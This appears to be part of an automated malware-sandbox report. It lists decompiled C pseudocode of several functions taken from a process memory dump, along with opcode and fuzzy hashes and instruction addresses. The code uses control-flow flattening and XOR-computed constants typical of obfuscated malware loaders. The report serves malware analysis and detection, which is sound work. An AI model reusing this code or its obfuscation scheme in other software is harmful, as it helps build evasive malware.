                                                                                                                                                                                                                    0x00a674f6
                                                                                                                                                                                                                    0x00a674f6
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a674f6
                                                                                                                                                                                                                    0x00a674f4
                                                                                                                                                                                                                    0x00a674ec
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a674e4
                                                                                                                                                                                                                    0x00a67557
                                                                                                                                                                                                                    0x00a6755e
                                                                                                                                                                                                                    0x00a67562
                                                                                                                                                                                                                    0x00a67564
                                                                                                                                                                                                                    0x00a67567
                                                                                                                                                                                                                    0x00a6756c
                                                                                                                                                                                                                    0x00a6756c
                                                                                                                                                                                                                    0x00a6756c
                                                                                                                                                                                                                    0x00a67579
                                                                                                                                                                                                                    0x00a67581

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: &sR$.m$8($Dj2J
                                                                                                                                                                                                                    • API String ID: 0-2945524437
                                                                                                                                                                                                                    • Opcode ID: 09444300026f28552b79660ba514c7093d9760ab634218c5d0a9d9e5b8274f3a
                                                                                                                                                                                                                    • Instruction ID: 93532f5c97fb547e81f5f86f86805c7c4c3002a9be67edf150595e3133a12f74
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09444300026f28552b79660ba514c7093d9760ab634218c5d0a9d9e5b8274f3a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 175165716093019BCB58CF61CA8541FFBF5FBC8708F009A1DF586A6260D7B5DA098B83
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                    			E00A7E31F(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                    				intOrPtr _v4;
                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                                    				intOrPtr _v16;
                                                                                                                                                                                                                    				signed int _v20;
                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                    				signed int _v28;
                                                                                                                                                                                                                    				signed int _v32;
                                                                                                                                                                                                                    				unsigned int _v36;
                                                                                                                                                                                                                    				signed int _v40;
                                                                                                                                                                                                                    				signed int _v44;
                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                                    				signed int _t82;
                                                                                                                                                                                                                    				signed int _t83;
                                                                                                                                                                                                                    				void* _t86;
                                                                                                                                                                                                                    				void* _t99;
                                                                                                                                                                                                                    				intOrPtr _t100;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_t99 = __ecx;
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t68);
                                                                                                                                                                                                                    				_v16 = 0xad703b;
                                                                                                                                                                                                                    				_t100 = 0;
                                                                                                                                                                                                                    				_v12 = 0xa4b0b7;
                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                    				_v4 = 0;
                                                                                                                                                                                                                    				_t86 = 0x7b1b32a;
                                                                                                                                                                                                                    				_v36 = 0xa38f64;
                                                                                                                                                                                                                    				_v36 = _v36 >> 5;
                                                                                                                                                                                                                    				_v36 = _v36 ^ 0x000bf697;
                                                                                                                                                                                                                    				_v40 = 0xecb802;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x2dff551d;
                                                                                                                                                                                                                    				_v40 = _v40 ^ 0x2d1c7ac5;
                                                                                                                                                                                                                    				_v32 = 0x6ef7a9;
                                                                                                                                                                                                                    				_v32 = _v32 << 5;
                                                                                                                                                                                                                    				_v32 = _v32 ^ 0x0dd6f28e;
                                                                                                                                                                                                                    				_v48 = 0x535047;
                                                                                                                                                                                                                    				_t23 =  &_v48; // 0x535047
                                                                                                                                                                                                                    				_t82 = 0x70;
                                                                                                                                                                                                                    				_v48 =  *_t23 / _t82;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x6bd6bd17;
                                                                                                                                                                                                                    				_v48 = _v48 ^ 0x6bd401ec;
                                                                                                                                                                                                                    				_v20 = 0x13d999;
                                                                                                                                                                                                                    				_v20 = _v20 >> 9;
                                                                                                                                                                                                                    				_v20 = _v20 ^ 0x0007284f;
                                                                                                                                                                                                                    				_v44 = 0x6b5e34;
                                                                                                                                                                                                                    				_v44 = _v44 >> 3;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x25b0fbc5;
                                                                                                                                                                                                                    				_v44 = _v44 ^ 0x25bb54a2;
                                                                                                                                                                                                                    				_v24 = 0x296a45;
                                                                                                                                                                                                                    				_v24 = _v24 + 0x306f;
                                                                                                                                                                                                                    				_v24 = _v24 ^ 0x002a06f4;
                                                                                                                                                                                                                    				_v28 = 0x34b23c;
                                                                                                                                                                                                                    				_t83 = 0x2b;
                                                                                                                                                                                                                    				_v28 = _v28 / _t83;
                                                                                                                                                                                                                    				_v28 = _v28 ^ 0x000dd6e7;
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t86 != 0x495837a) {
                                                                                                                                                                                                                    						if(_t86 == 0x7b1b32a) {
                                                                                                                                                                                                                    							 *0xa83b3c = E00A7C6D9(0x24);
                                                                                                                                                                                                                    							_t86 = 0xcd3620b;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t86 == 0x818e256) {
                                                                                                                                                                                                                    								E00A76A6B( *0xa83b3c, _v20, _v44, _v24, _v28);
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								if(_t86 == 0xcd3620b) {
                                                                                                                                                                                                                    									if(E00A64871() != 0) {
                                                                                                                                                                                                                    										_t86 = 0x495837a;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                    									if(_t86 != 0xe485c19) {
                                                                                                                                                                                                                    										goto L12;
                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                    										E00A62C1D();
                                                                                                                                                                                                                    										_t86 = 0x818e256;
                                                                                                                                                                                                                    										continue;
                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						L15:
                                                                                                                                                                                                                    						return _t100;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t61 =  &_v48; // 0x535047
                                                                                                                                                                                                                    					_t100 = E00A7807A(_a4, _v32, _t99,  *_t61);
                                                                                                                                                                                                                    					if(_t100 == 0) {
                                                                                                                                                                                                                    						_t86 = 0xe485c19;
                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					goto L15;
                                                                                                                                                                                                                    					L12:
                                                                                                                                                                                                                    				} while (_t86 != 0x1006644);
                                                                                                                                                                                                                    				goto L15;
                                                                                                                                                                                                                    			}





















                                                                                                                                                                                                                    0x00a7e326
                                                                                                                                                                                                                    0x00a7e32a
                                                                                                                                                                                                                    0x00a7e32c
                                                                                                                                                                                                                    0x00a7e330
                                                                                                                                                                                                                    0x00a7e331
                                                                                                                                                                                                                    0x00a7e332
                                                                                                                                                                                                                    0x00a7e337
                                                                                                                                                                                                                    0x00a7e33f
                                                                                                                                                                                                                    0x00a7e341
                                                                                                                                                                                                                    0x00a7e34c
                                                                                                                                                                                                                    0x00a7e352
                                                                                                                                                                                                                    0x00a7e356
                                                                                                                                                                                                                    0x00a7e35b
                                                                                                                                                                                                                    0x00a7e368
                                                                                                                                                                                                                    0x00a7e36d
                                                                                                                                                                                                                    0x00a7e375
                                                                                                                                                                                                                    0x00a7e37d
                                                                                                                                                                                                                    0x00a7e385
                                                                                                                                                                                                                    0x00a7e38d
                                                                                                                                                                                                                    0x00a7e395
                                                                                                                                                                                                                    0x00a7e39a
                                                                                                                                                                                                                    0x00a7e3a2
                                                                                                                                                                                                                    0x00a7e3aa
                                                                                                                                                                                                                    0x00a7e3b0
                                                                                                                                                                                                                    0x00a7e3b5
                                                                                                                                                                                                                    0x00a7e3bb
                                                                                                                                                                                                                    0x00a7e3c3
                                                                                                                                                                                                                    0x00a7e3cb
                                                                                                                                                                                                                    0x00a7e3d3
                                                                                                                                                                                                                    0x00a7e3d8
                                                                                                                                                                                                                    0x00a7e3e0
                                                                                                                                                                                                                    0x00a7e3e8
                                                                                                                                                                                                                    0x00a7e3ed
                                                                                                                                                                                                                    0x00a7e3f5
                                                                                                                                                                                                                    0x00a7e3fd
                                                                                                                                                                                                                    0x00a7e405
                                                                                                                                                                                                                    0x00a7e40d
                                                                                                                                                                                                                    0x00a7e415
                                                                                                                                                                                                                    0x00a7e421
                                                                                                                                                                                                                    0x00a7e429
                                                                                                                                                                                                                    0x00a7e42d
                                                                                                                                                                                                                    0x00a7e435
                                                                                                                                                                                                                    0x00a7e435
                                                                                                                                                                                                                    0x00a7e43f
                                                                                                                                                                                                                    0x00a7e47b
                                                                                                                                                                                                                    0x00a7e480
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7e441
                                                                                                                                                                                                                    0x00a7e443
                                                                                                                                                                                                                    0x00a7e4c6
                                                                                                                                                                                                                    0x00a7e445
                                                                                                                                                                                                                    0x00a7e44b
                                                                                                                                                                                                                    0x00a7e465
                                                                                                                                                                                                                    0x00a7e467
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7e467
                                                                                                                                                                                                                    0x00a7e44d
                                                                                                                                                                                                                    0x00a7e453
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7e455
                                                                                                                                                                                                                    0x00a7e455
                                                                                                                                                                                                                    0x00a7e45a
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7e45a
                                                                                                                                                                                                                    0x00a7e453
                                                                                                                                                                                                                    0x00a7e44b
                                                                                                                                                                                                                    0x00a7e443
                                                                                                                                                                                                                    0x00a7e4cf
                                                                                                                                                                                                                    0x00a7e4d7
                                                                                                                                                                                                                    0x00a7e4d7
                                                                                                                                                                                                                    0x00a7e487
                                                                                                                                                                                                                    0x00a7e499
                                                                                                                                                                                                                    0x00a7e49f
                                                                                                                                                                                                                    0x00a7e4a1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7e4a1
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a7e4a6
                                                                                                                                                                                                                    0x00a7e4a6
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: 4^k$Ej)$GPS$o0
                                                                                                                                                                                                                    • API String ID: 0-2603868797
                                                                                                                                                                                                                    • Opcode ID: 3d25aa7a3505aad588e56c80949657218ca75603cddb0cb29efee7c5b39072b0
                                                                                                                                                                                                                    • Instruction ID: ee0c7b15bf6754c4f0d31ca9d6da6bf17991a64f7a64b4698b436d90c5513ae9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3d25aa7a3505aad588e56c80949657218ca75603cddb0cb29efee7c5b39072b0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 654186B21083009FC758DF20988952FBBF1FB88758F10D91DF59AA6260D772CA198F83
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                    			E00A6DBE7() {
                                                                                                                                                                                                                    				char _v520;
                                                                                                                                                                                                                    				char _v1040;
                                                                                                                                                                                                                    				signed int _v1044;
                                                                                                                                                                                                                    				intOrPtr _v1048;
                                                                                                                                                                                                                    				signed int _v1052;
                                                                                                                                                                                                                    				signed int _v1056;
                                                                                                                                                                                                                    				signed int _v1060;
                                                                                                                                                                                                                    				signed int _v1064;
                                                                                                                                                                                                                    				signed int _v1068;
                                                                                                                                                                                                                    				signed int _v1072;
                                                                                                                                                                                                                    				signed int _v1076;
                                                                                                                                                                                                                    				signed int _v1080;
                                                                                                                                                                                                                    				unsigned int _v1084;
                                                                                                                                                                                                                    				signed int _v1088;
                                                                                                                                                                                                                    				signed int _v1092;
                                                                                                                                                                                                                    				signed int _v1096;
                                                                                                                                                                                                                    				signed int _v1100;
                                                                                                                                                                                                                    				signed int _v1104;
                                                                                                                                                                                                                    				signed int _v1108;
                                                                                                                                                                                                                    				signed int _v1112;
                                                                                                                                                                                                                    				signed int _v1116;
                                                                                                                                                                                                                    				signed int _v1120;
                                                                                                                                                                                                                    				signed int _v1124;
                                                                                                                                                                                                                    				signed int _v1128;
                                                                                                                                                                                                                    				signed int _v1132;
                                                                                                                                                                                                                    				unsigned int _v1136;
                                                                                                                                                                                                                    				signed int _v1140;
                                                                                                                                                                                                                    				signed int _v1144;
                                                                                                                                                                                                                    				signed int _v1148;
                                                                                                                                                                                                                    				signed int _v1152;
                                                                                                                                                                                                                    				signed int _v1156;
                                                                                                                                                                                                                    				signed int _v1160;
                                                                                                                                                                                                                    				signed int _v1164;
                                                                                                                                                                                                                    				signed int _v1168;
                                                                                                                                                                                                                    				void* _t323;
                                                                                                                                                                                                                    				void* _t324;
                                                                                                                                                                                                                    				signed int _t328;
                                                                                                                                                                                                                    				signed int _t329;
                                                                                                                                                                                                                    				signed int _t330;
                                                                                                                                                                                                                    				signed int _t331;
                                                                                                                                                                                                                    				signed int _t332;
                                                                                                                                                                                                                    				signed int _t333;
                                                                                                                                                                                                                    				signed int _t334;
                                                                                                                                                                                                                    				void* _t372;
                                                                                                                                                                                                                    				signed int* _t376;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t376 =  &_v1168;
                                                                                                                                                                                                                    				_v1044 = _v1044 & 0x00000000;
                                                                                                                                                                                                                    				_v1048 = 0x401d7e;
                                                                                                                                                                                                                    				_v1136 = 0xfc3c49;
                                                                                                                                                                                                                    				_t328 = 0x1e;
                                                                                                                                                                                                                    				_v1136 = _v1136 / _t328;
                                                                                                                                                                                                                    				_v1136 = _v1136 >> 7;
                                                                                                                                                                                                                    				_t372 = 0xce3a0a6;
                                                                                                                                                                                                                    				_v1136 = _v1136 ^ 0x000b63b3;
                                                                                                                                                                                                                    				_v1148 = 0xa223c8;
                                                                                                                                                                                                                    				_t329 = 0x68;
                                                                                                                                                                                                                    				_v1148 = _v1148 * 0x36;
                                                                                                                                                                                                                    				_v1148 = _v1148 ^ 0x532ee8d4;
                                                                                                                                                                                                                    				_v1148 = _v1148 ^ 0x0392ca68;
                                                                                                                                                                                                                    				_v1148 = _v1148 ^ 0x7284535f;
                                                                                                                                                                                                                    				_v1156 = 0x7adb4d;
                                                                                                                                                                                                                    				_v1156 = _v1156 + 0x5fbf;
                                                                                                                                                                                                                    				_v1156 = _v1156 * 0x39;
                                                                                                                                                                                                                    				_v1156 = _v1156 >> 3;
                                                                                                                                                                                                                    				_v1156 = _v1156 ^ 0x0365a28e;
                                                                                                                                                                                                                    				_v1164 = 0xe70fba;
                                                                                                                                                                                                                    				_v1164 = _v1164 * 0x6a;
                                                                                                                                                                                                                    				_v1164 = _v1164 | 0x4a7d501c;
                                                                                                                                                                                                                    				_v1164 = _v1164 << 0xf;
                                                                                                                                                                                                                    				_v1164 = _v1164 ^ 0xe98dd94b;
                                                                                                                                                                                                                    				_v1168 = 0x3805d2;
                                                                                                                                                                                                                    				_v1168 = _v1168 + 0x41d4;
                                                                                                                                                                                                                    				_v1168 = _v1168 / _t329;
                                                                                                                                                                                                                    				_t330 = 0xe;
                                                                                                                                                                                                                    				_v1168 = _v1168 / _t330;
                                                                                                                                                                                                                    				_v1168 = _v1168 ^ 0x0008a884;
                                                                                                                                                                                                                    				_v1052 = 0xb038a7;
                                                                                                                                                                                                                    				_v1052 = _v1052 ^ 0x2b514b8a;
                                                                                                                                                                                                                    				_v1052 = _v1052 ^ 0x2beb54b1;
                                                                                                                                                                                                                    				_v1132 = 0x2b99ca;
                                                                                                                                                                                                                    				_v1132 = _v1132 ^ 0x34188fd2;
                                                                                                                                                                                                                    				_v1132 = _v1132 | 0xcc023217;
                                                                                                                                                                                                                    				_t331 = 0x2c;
                                                                                                                                                                                                                    				_v1132 = _v1132 * 0x6f;
                                                                                                                                                                                                                    				_v1132 = _v1132 ^ 0x5a35b85b;
                                                                                                                                                                                                                    				_v1060 = 0x580c74;
                                                                                                                                                                                                                    				_v1060 = _v1060 >> 0xc;
                                                                                                                                                                                                                    				_v1060 = _v1060 ^ 0x000b24fd;
                                                                                                                                                                                                                    				_v1140 = 0x966c3a;
                                                                                                                                                                                                                    				_v1140 = _v1140 >> 6;
                                                                                                                                                                                                                    				_v1140 = _v1140 + 0xf7d9;
                                                                                                                                                                                                                    				_v1140 = _v1140 | 0xe045f6dc;
                                                                                                                                                                                                                    				_v1140 = _v1140 ^ 0xe0451fa7;
                                                                                                                                                                                                                    				_v1072 = 0x5b0071;
                                                                                                                                                                                                                    				_v1072 = _v1072 / _t331;
                                                                                                                                                                                                                    				_v1072 = _v1072 ^ 0x000369c5;
                                                                                                                                                                                                                    				_v1116 = 0x972e16;
                                                                                                                                                                                                                    				_v1116 = _v1116 << 3;
                                                                                                                                                                                                                    				_v1116 = _v1116 >> 0x10;
                                                                                                                                                                                                                    				_v1116 = _v1116 + 0xffff019d;
                                                                                                                                                                                                                    				_v1116 = _v1116 ^ 0xfffeacba;
                                                                                                                                                                                                                    				_v1124 = 0xffe169;
                                                                                                                                                                                                                    				_v1124 = _v1124 | 0x82905b1e;
                                                                                                                                                                                                                    				_t332 = 0x51;
                                                                                                                                                                                                                    				_v1124 = _v1124 * 0x4a;
                                                                                                                                                                                                                    				_v1124 = _v1124 | 0x8043ed8d;
                                                                                                                                                                                                                    				_v1124 = _v1124 ^ 0xddf12541;
                                                                                                                                                                                                                    				_v1068 = 0xae25e7;
                                                                                                                                                                                                                    				_v1068 = _v1068 ^ 0xa57bf192;
                                                                                                                                                                                                                    				_v1068 = _v1068 ^ 0xa5daeb65;
                                                                                                                                                                                                                    				_v1120 = 0xee25ec;
                                                                                                                                                                                                                    				_v1120 = _v1120 ^ 0x53ff9739;
                                                                                                                                                                                                                    				_v1120 = _v1120 << 8;
                                                                                                                                                                                                                    				_v1120 = _v1120 | 0x95a0acd1;
                                                                                                                                                                                                                    				_v1120 = _v1120 ^ 0x95b20665;
                                                                                                                                                                                                                    				_v1160 = 0x3a0fe4;
                                                                                                                                                                                                                    				_v1160 = _v1160 ^ 0xf3f21ebf;
                                                                                                                                                                                                                    				_v1160 = _v1160 + 0x96fc;
                                                                                                                                                                                                                    				_v1160 = _v1160 + 0xffffdf7d;
                                                                                                                                                                                                                    				_v1160 = _v1160 ^ 0xf3caa125;
                                                                                                                                                                                                                    				_v1104 = 0xf42402;
                                                                                                                                                                                                                    				_v1104 = _v1104 >> 5;
                                                                                                                                                                                                                    				_v1104 = _v1104 * 0x30;
                                                                                                                                                                                                                    				_v1104 = _v1104 ^ 0x016d17a0;
                                                                                                                                                                                                                    				_v1084 = 0xf82282;
                                                                                                                                                                                                                    				_v1084 = _v1084 << 0xd;
                                                                                                                                                                                                                    				_v1084 = _v1084 >> 0xe;
                                                                                                                                                                                                                    				_v1084 = _v1084 ^ 0x0006c32d;
                                                                                                                                                                                                                    				_v1096 = 0xc0cb2a;
                                                                                                                                                                                                                    				_v1096 = _v1096 + 0x7bdc;
                                                                                                                                                                                                                    				_v1096 = _v1096 * 0x28;
                                                                                                                                                                                                                    				_v1096 = _v1096 ^ 0x1e372932;
                                                                                                                                                                                                                    				_v1100 = 0x661d7;
                                                                                                                                                                                                                    				_v1100 = _v1100 + 0xffff2e46;
                                                                                                                                                                                                                    				_v1100 = _v1100 ^ 0xe40dc353;
                                                                                                                                                                                                                    				_v1100 = _v1100 ^ 0xe40f1873;
                                                                                                                                                                                                                    				_v1128 = 0x917320;
                                                                                                                                                                                                                    				_v1128 = _v1128 << 5;
                                                                                                                                                                                                                    				_v1128 = _v1128 | 0x7842679a;
                                                                                                                                                                                                                    				_v1128 = _v1128 / _t332;
                                                                                                                                                                                                                    				_v1128 = _v1128 ^ 0x0181cae1;
                                                                                                                                                                                                                    				_v1152 = 0xd1bec9;
                                                                                                                                                                                                                    				_v1152 = _v1152 >> 0xd;
                                                                                                                                                                                                                    				_v1152 = _v1152 + 0xffff963b;
                                                                                                                                                                                                                    				_v1152 = _v1152 | 0xaf16fa7d;
                                                                                                                                                                                                                    				_v1152 = _v1152 ^ 0xfff08b1a;
                                                                                                                                                                                                                    				_v1076 = 0xc311e7;
                                                                                                                                                                                                                    				_v1076 = _v1076 + 0xffffc325;
                                                                                                                                                                                                                    				_v1076 = _v1076 ^ 0x00cdc4f2;
                                                                                                                                                                                                                    				_v1092 = 0x2ac647;
                                                                                                                                                                                                                    				_v1092 = _v1092 + 0x7b6e;
                                                                                                                                                                                                                    				_v1092 = _v1092 | 0xc975f737;
                                                                                                                                                                                                                    				_v1092 = _v1092 ^ 0xc977a55b;
                                                                                                                                                                                                                    				_v1112 = 0x54c9e2;
                                                                                                                                                                                                                    				_v1112 = _v1112 >> 6;
                                                                                                                                                                                                                    				_v1112 = _v1112 >> 1;
                                                                                                                                                                                                                    				_v1112 = _v1112 ^ 0xc70de797;
                                                                                                                                                                                                                    				_v1112 = _v1112 ^ 0xc70efa05;
                                                                                                                                                                                                                    				_v1144 = 0xe3f20;
                                                                                                                                                                                                                    				_v1144 = _v1144 | 0x42434012;
                                                                                                                                                                                                                    				_v1144 = _v1144 + 0xffff66be;
                                                                                                                                                                                                                    				_t333 = 0x69;
                                                                                                                                                                                                                    				_v1144 = _v1144 * 0x17;
                                                                                                                                                                                                                    				_v1144 = _v1144 ^ 0xf51fc103;
                                                                                                                                                                                                                    				_v1056 = 0x4dd6ba;
                                                                                                                                                                                                                    				_v1056 = _v1056 | 0x5821a7d7;
                                                                                                                                                                                                                    				_v1056 = _v1056 ^ 0x58686481;
                                                                                                                                                                                                                    				_v1108 = 0xbcd1ad;
                                                                                                                                                                                                                    				_v1108 = _v1108 / _t333;
                                                                                                                                                                                                                    				_v1108 = _v1108 ^ 0x3dff8f4e;
                                                                                                                                                                                                                    				_t334 = 0x4f;
                                                                                                                                                                                                                    				_v1108 = _v1108 / _t334;
                                                                                                                                                                                                                    				_v1108 = _v1108 ^ 0x00c4a737;
                                                                                                                                                                                                                    				_v1064 = 0xae5756;
                                                                                                                                                                                                                    				_v1064 = _v1064 + 0xdb77;
                                                                                                                                                                                                                    				_v1064 = _v1064 ^ 0x00a4e1ed;
                                                                                                                                                                                                                    				_v1080 = 0xde508;
                                                                                                                                                                                                                    				_v1080 = _v1080 | 0xb27ff1fe;
                                                                                                                                                                                                                    				_v1080 = _v1080 ^ 0xb2792c2e;
                                                                                                                                                                                                                    				_v1088 = 0x5d028d;
                                                                                                                                                                                                                    				_v1088 = _v1088 | 0xe622f3fa;
                                                                                                                                                                                                                    				_v1088 = _v1088 + 0xed5;
                                                                                                                                                                                                                    				_v1088 = _v1088 ^ 0xe687ed93;
                                                                                                                                                                                                                    				E00A7090C(_t334);
                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                    					while(_t372 != 0x7e6b306) {
                                                                                                                                                                                                                    						if(_t372 == 0xce3a0a6) {
                                                                                                                                                                                                                    							_t372 = 0xd0355ab;
                                                                                                                                                                                                                    							continue;
                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                    							if(_t372 == 0xd0355ab) {
                                                                                                                                                                                                                    								_push(_v1168);
                                                                                                                                                                                                                    								_push(_v1164);
                                                                                                                                                                                                                    								_push(_v1156);
                                                                                                                                                                                                                    								E00A7E773(_v1132, __eflags,  *0xa83b38 + 0xc, _v1060,  *0xa83b38 + 0x21c,  &_v520, E00A81E60(0xa610fc, _v1148, __eflags),  *0xa83b38 + 0x21c, _v1140);
                                                                                                                                                                                                                    								_t323 = E00A7D6DF(_v1072, _t318, _v1116, _v1124);
                                                                                                                                                                                                                    								_t376 =  &(_t376[0xc]);
                                                                                                                                                                                                                    								_t372 = 0xd96e298;
                                                                                                                                                                                                                    								continue;
                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                    								_t383 = _t372 - 0xd96e298;
                                                                                                                                                                                                                    								if(_t372 == 0xd96e298) {
                                                                                                                                                                                                                    									_push(_v1104);
                                                                                                                                                                                                                    									_push(_v1160);
                                                                                                                                                                                                                    									_push(_v1120);
                                                                                                                                                                                                                    									_t324 = E00A81E60(0xa611bc, _v1068, _t383);
                                                                                                                                                                                                                    									E00A61E6F(_v1100,  *0xa83b38 + 0x21c, E00A773DE(), _t324, _v1128,  *0xa83b38 + 0x21c, _v1152, _v1076,  *0xa83b38 + 0xc, _v1092,  &_v1040);
                                                                                                                                                                                                                    									_t323 = E00A7D6DF(_v1112, _t324, _v1144, _v1056);
                                                                                                                                                                                                                    									_t376 =  &(_t376[0xf]);
                                                                                                                                                                                                                    									_t372 = 0x7e6b306;
                                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                    						goto L9;
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_push(_v1088);
                                                                                                                                                                                                                    					_push(_v1080);
                                                                                                                                                                                                                    					_push(_v1064);
                                                                                                                                                                                                                    					_push(_v1108);
                                                                                                                                                                                                                    					E00A77900( &_v520,  &_v1040, __eflags);
                                                                                                                                                                                                                    					_t376 =  &(_t376[4]);
                                                                                                                                                                                                                    					_t372 = 0x6e75a34;
                                                                                                                                                                                                                    					L9:
                                                                                                                                                                                                                    					__eflags = _t372 - 0x6e75a34;
                                                                                                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                                                                                                    				return _t323;
                                                                                                                                                                                                                    			}
















































                                                                                                                                                                                                                    0x00a6dbe7
                                                                                                                                                                                                                    0x00a6dbed
                                                                                                                                                                                                                    0x00a6dbf4
                                                                                                                                                                                                                    0x00a6dbfc
                                                                                                                                                                                                                    0x00a6dc16
                                                                                                                                                                                                                    0x00a6dc1b
                                                                                                                                                                                                                    0x00a6dc21
                                                                                                                                                                                                                    0x00a6dc26
                                                                                                                                                                                                                    0x00a6dc2b
                                                                                                                                                                                                                    0x00a6dc33
                                                                                                                                                                                                                    0x00a6dc40
                                                                                                                                                                                                                    0x00a6dc43
                                                                                                                                                                                                                    0x00a6dc47
                                                                                                                                                                                                                    0x00a6dc4f
                                                                                                                                                                                                                    0x00a6dc57
                                                                                                                                                                                                                    0x00a6dc5f
                                                                                                                                                                                                                    0x00a6dc67
                                                                                                                                                                                                                    0x00a6dc74
                                                                                                                                                                                                                    0x00a6dc78
                                                                                                                                                                                                                    0x00a6dc7d
                                                                                                                                                                                                                    0x00a6dc85
                                                                                                                                                                                                                    0x00a6dc92
                                                                                                                                                                                                                    0x00a6dc96
                                                                                                                                                                                                                    0x00a6dc9e
                                                                                                                                                                                                                    0x00a6dca3
                                                                                                                                                                                                                    0x00a6dcab
                                                                                                                                                                                                                    0x00a6dcb3
                                                                                                                                                                                                                    0x00a6dcc3
                                                                                                                                                                                                                    0x00a6dccb
                                                                                                                                                                                                                    0x00a6dcd0
                                                                                                                                                                                                                    0x00a6dcd6
                                                                                                                                                                                                                    0x00a6dcde
                                                                                                                                                                                                                    0x00a6dce9
                                                                                                                                                                                                                    0x00a6dcf4
                                                                                                                                                                                                                    0x00a6dcff
                                                                                                                                                                                                                    0x00a6dd07
                                                                                                                                                                                                                    0x00a6dd0f
                                                                                                                                                                                                                    0x00a6dd1c
                                                                                                                                                                                                                    0x00a6dd1d
                                                                                                                                                                                                                    0x00a6dd21
                                                                                                                                                                                                                    0x00a6dd29
                                                                                                                                                                                                                    0x00a6dd31
                                                                                                                                                                                                                    0x00a6dd36
                                                                                                                                                                                                                    0x00a6dd3e
                                                                                                                                                                                                                    0x00a6dd46
                                                                                                                                                                                                                    0x00a6dd4b
                                                                                                                                                                                                                    0x00a6dd53
                                                                                                                                                                                                                    0x00a6dd5b
                                                                                                                                                                                                                    0x00a6dd63
                                                                                                                                                                                                                    0x00a6dd71
                                                                                                                                                                                                                    0x00a6dd75
                                                                                                                                                                                                                    0x00a6dd7d
                                                                                                                                                                                                                    0x00a6dd85
                                                                                                                                                                                                                    0x00a6dd8a
                                                                                                                                                                                                                    0x00a6dd8f
                                                                                                                                                                                                                    0x00a6dd97
                                                                                                                                                                                                                    0x00a6dd9f
                                                                                                                                                                                                                    0x00a6dda9
                                                                                                                                                                                                                    0x00a6ddb8
                                                                                                                                                                                                                    0x00a6ddbb
                                                                                                                                                                                                                    0x00a6ddbf
                                                                                                                                                                                                                    0x00a6ddc7
                                                                                                                                                                                                                    0x00a6ddcf
                                                                                                                                                                                                                    0x00a6ddd7
                                                                                                                                                                                                                    0x00a6dddf
                                                                                                                                                                                                                    0x00a6dde7
                                                                                                                                                                                                                    0x00a6ddef
                                                                                                                                                                                                                    0x00a6ddf7
                                                                                                                                                                                                                    0x00a6ddfc
                                                                                                                                                                                                                    0x00a6de04
                                                                                                                                                                                                                    0x00a6de0c
                                                                                                                                                                                                                    0x00a6de14
